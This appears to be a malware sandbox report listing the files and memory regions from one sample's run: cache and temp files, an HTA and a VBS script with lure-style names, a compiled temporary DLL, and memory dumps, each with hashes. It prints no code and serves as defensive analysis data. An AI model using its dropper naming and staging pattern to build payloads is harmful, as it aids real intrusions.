C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
471B

MD5
dbadb85871e4f3f4eadd95c3a506ea42

SHA1
1d09db408cd08f9246f200f38cf3b759e090d85f

SHA256
fa23a9c2aadaf557269eb5665bb0b0ba4a576a9b6b253fa8266eedfc1dc15709

SHA512
4ac8d952c6faeb666ea7eafe8cdd73219974b4cee0a9609dd6cfea26090bca3ad4069ef84a45142d0dea1d73244a1cd8042105ecd51c05615ca41df2f5bb6a29

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\75CA58072B9926F763A91F0CC2798706_056B48C93C4964C2E64C0A8958238656

Filesize
434B

MD5
57ff7c57582b65f47f5bb4d6a0e1b87b

SHA1
2d9acddf227363ca00c7f39f4151e1254feb5340

SHA256
a13af5b771ad8ce50605a39263c81bc6bc5ca7a7b3639a5064d5b80006d491e1

SHA512
4e102be56b355ebf43131fc6c1bb3ec85f6d5f0f6c0fe591c7e0790331c48b8ce33868eb0e3e6558f0b52259feaf747289216cb2be9bdc13cc8fbcc7e5a5d1c9

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
d5cd57bb3dea261df4e5301b9290c1b2

SHA1
4b26af0a1cf4b22e0403c2b53a73df1340897285

SHA256
ae7c04d98c1cad59f6ac1e10e8028dcea5999b60a298ba5d6521a47313f9aef7

SHA512
e7d51a6d3668bfc844b0a4af762d355f7779531efd38045bb8c3a66cc5ea070b97a35bda480343d7fa202ebe0a54b540cb42d37da88deb645b99d07183c4ba14

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
95adfccbe594eeeb2c0d2d2df025fa98

SHA1
180ba913547e18398720ee1e6cb2ff3547193c14

SHA256
19044fdd9cc7966d8c72e7a57d5faf0f35739e382b8ffff03ea4615ca48db1da

SHA512
1e46b26a5d8fed831954d2f977b88f8c6fdb07901f5699d96aeb7b40868f67e285695c82d8f63e5477d53253cf45242910ee8d7adde29f85b800b6da0b491c73

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B66240B0F6C84BD4857ABA60CF5CE4A0_5043E0F5DF723415C9EECC201C838A62

Filesize
458B

MD5
3956c7d6bd307c9a1e314a19c5d14f53

SHA1
839c63bf2435b42bd6b264a22b5d61332707d095

SHA256
47d7035335a51da9de995fc3377c6cfb0de703908de151539a70bc9678f6f3cc

SHA512
375c02f8209e8751f4b43e23b9a233bc8e46ab90263e41c0b9fc9001e65af4ec595b2435c7ec07ecbfe7435cbc12c691da3085205d57139e37415b9d9d81e50a

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\BAD725C80F9E10846F35D039A996E4A8_88B6AE015495C1ECC395D19C1DD02894

Filesize
432B

MD5
dca76a9e5e5d70e040a0c942d56d7dea

SHA1
b4154fd48539c0abeef0409a30948db3352c4712

SHA256
453806d4bac1ed189852f87be4a770245e159ddfe546968d38c7dc335e0676ed

SHA512
27efe08955d1555a148a3a30f18f908a171fbef74661fbc6165f19fa1cb8bca095233dacf1537c0797a9f78404be42faa891cd59b84f51647875e47ca74bab02

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F53EB4E574DE32C870452087D92DBEBB_1D05198E4FEA086037F021F18838C63E

Filesize
426B

MD5
767615e802f0be27ba213f4e8e985d15

SHA1
5c476c85afbe6caa493476a1d035139f1f2e184b

SHA256
c841b63c1d262f8492adbcdbe4acd9abff717528ce7a099733f76bb9df37f615

SHA512
bfad46c5678f6c8cd8a81628f70d91e8f0106e80ce7927545bb9dc2be6b2331d555b830de0fc3be7b6be43b788c8ab7049b385720a05287cd12875c324528f99

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\Y8UFEBH5\nicegirlkissedmewithloverissingmegoodgreatthings[1].hta

Filesize
8KB

MD5
842483d04a67c27b01ea5f7c5f61b343

SHA1
0983aa82c399193df44b6092058c0e19371b0082

SHA256
499252477bb698052e47f7025764032057381aef772421a00ed801ef1282a840

SHA512
9f3ba55ff984ddafe193f69aea1410722f810fce459e7076cf503db679b0ac61911857e62d422687b459574a6914420744bc8cebd74eecda257b18e7ed6b8474

Download Submit
C:\Users\Admin\AppData\Local\Temp\CabEC45.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RESFB.tmp

Filesize
1KB

MD5
b20887d088cfe5b5df2fa95991da3e79

SHA1
5459fcc4463793b557909d7d7d870c1d19ce35cf

SHA256
bc12afadfdb151d1a2b4e2f95459c66e57861f1de0de793f38f2609447b022f0

SHA512
eb3814dff1337a2afdec435afa80f84f7db265e2add53f7216cbf97bb2912cc55e7ce58ee27764d4c451efe5b78ce1bb1dd246cab23057bbcf8a2e4a87803b22

Download Submit
C:\Users\Admin\AppData\Local\Temp\TarEC58.tmp

Filesize
181KB

MD5
4ea6026cf93ec6338144661bf1202cd1

SHA1
a1dec9044f750ad887935a01430bf49322fbdcb7

SHA256
8efbc21559ef8b1bcf526800d8070baad42474ce7198e26fa771dbb41a76b1d8

SHA512
6c7e0980e39aacf4c3689802353f464a08cd17753bd210ee997e5f2a455deb4f287a9ef74d84579dbde49bc96213cd2b8b247723919c412ea980aa6e6bfe218b

Download Submit
C:\Users\Admin\AppData\Local\Temp\amaiznfh.dll

Filesize
3KB

MD5
fc727114710b9ff3d41fd196b321940a

SHA1
fc5b05afe5f4921aa119db5e353cd0c719b0e467

SHA256
541838baa58a416c2948bfe20ac741f0c9ed7138c0d844d218abf19562315f9c

SHA512
58f31bc41c8c4bcab74542b346fa5d5fa5947c13076fd5a68c1e39980c3f2a541cbb2bda587a4b60f8c6e034659d6009bd6de6f91125f3a33d31d8623e4426df

Download Submit
C:\Users\Admin\AppData\Local\Temp\amaiznfh.pdb

Filesize
7KB

MD5
c5c4654dab64898c5e4fc15c6f36c038

SHA1
48e9a7396d04fc89a4d766841d0f87ba55322510

SHA256
e56bbca686bd2b486f036244c2eca3823f488c03c8f287134bd7ee2ec1a26716

SHA512
bce1c2a4bfb8a0828df4db4d034257ea79da973474a7f8e230dba0d621a64003ca7198c2ec4c9aa173eb6900ee7c5429a425d7f6946ea22ff55d2576fcb0653a

Download Submit
C:\Users\Admin\AppData\Local\Temp\zlcxyltfyxm

Filesize
2B

MD5
f3b25701fe362ec84616a93a45ce9998

SHA1
d62636d8caec13f04e28442a0a6fa1afeb024bbb

SHA256
b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209

SHA512
98c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
00e36aaa7bb30f7dd8342626c5187b88

SHA1
6e878d05399759ea8d6a8d0ace6eb51bf25ff10f

SHA256
772be21f05bf6c3897b25b85bc11f04e91a1b68b0400a0638e5805b985b99143

SHA512
a6b7f89bc9fb092a21fd8a3e670b8ec1cf458a38f01e169d0397cdec07dda4f9f8c72b9ba3d261a6140b321d9472cec98696b8a2e669363f9ef7a21797e9aa0c

Download Submit
C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS

Filesize
213KB

MD5
b14ef4fa92414ea1658977a049f15306

SHA1
11e59f935817673e2b68cfd36e4ce93d15034714

SHA256
a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3

SHA512
8b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSCFA.tmp

Filesize
652B

MD5
0142b69b1db9ee30b3d226d84a93aafc

SHA1
f2687b8ca72a2dc9c161c4fef63fea540bb2c864

SHA256
ad4fb2df223a2547d6f7d5d4bea93d93305c06e99120764bc9c4c06bfa2c9f60

SHA512
962f766cb0ceed50454e1555e6ab5530ba3a2f8648bec57c71ad9d6148a77fc8189391205e614d64e6a7308d54f45d8011b74770b7510eb01e73fed8f8cb288b

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\amaiznfh.0.cs

Filesize
478B

MD5
680c55127532e413a19eddb51b0cb473

SHA1
7d279e255bc675f1c09df8b210ee4472b5d3b8b6

SHA256
fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515

SHA512
27a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\amaiznfh.cmdline

Filesize
309B

MD5
578f7d8dbecb301e01cc233503412770

SHA1
81b7f689fd6bf61409f4c611227c9842253282fa

SHA256
e4023d93bbe580d39a6f8173901c72dc4369cd4e9f2dabcd8c7035732fd45516

SHA512
d23148308d78820868c49a650844a9a9816fe7999e2b4e16e8b333906c58855738784fd6306a04a43507510247d5f7ecb44b0297bd90b2976b87a1b43c86e550

Download Submit
memory/1028-208-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-240-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1028-253-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-252-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-198-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-200-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-213-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-212-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-211-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-210-0x000000007EFDE000-0x000000007EFDF000-memory.dmp

Filesize
4KB

Download
memory/1028-251-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-206-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-204-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-202-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-214-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-215-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-216-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-217-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-218-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-250-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-248-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-249-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-247-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-246-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-245-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-243-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1028-244-0x0000000010000000-0x0000000010019000-memory.dmp

Filesize
100KB

Download
memory/1028-238-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1028-239-0x0000000000400000-0x0000000000480000-memory.dmp

Filesize
512KB

Download
memory/1708-145-0x00000000022A0000-0x00000000022A2000-memory.dmp

Filesize
8KB

Download
memory/2556-232-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2556-230-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2556-231-0x0000000000400000-0x0000000000424000-memory.dmp

Filesize
144KB

Download
memory/2708-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2708-189-0x000000007200D000-0x0000000072018000-memory.dmp

Filesize
44KB

Download
memory/2708-1-0x000000007200D000-0x0000000072018000-memory.dmp

Filesize
44KB

Download
memory/2708-146-0x00000000023C0000-0x00000000023C2000-memory.dmp

Filesize
8KB

Download
memory/2824-225-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2824-222-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2824-227-0x0000000000400000-0x0000000000478000-memory.dmp

Filesize
480KB

Download
memory/2892-224-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2892-228-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download
memory/2892-226-0x0000000000400000-0x0000000000462000-memory.dmp

Filesize
392KB

Download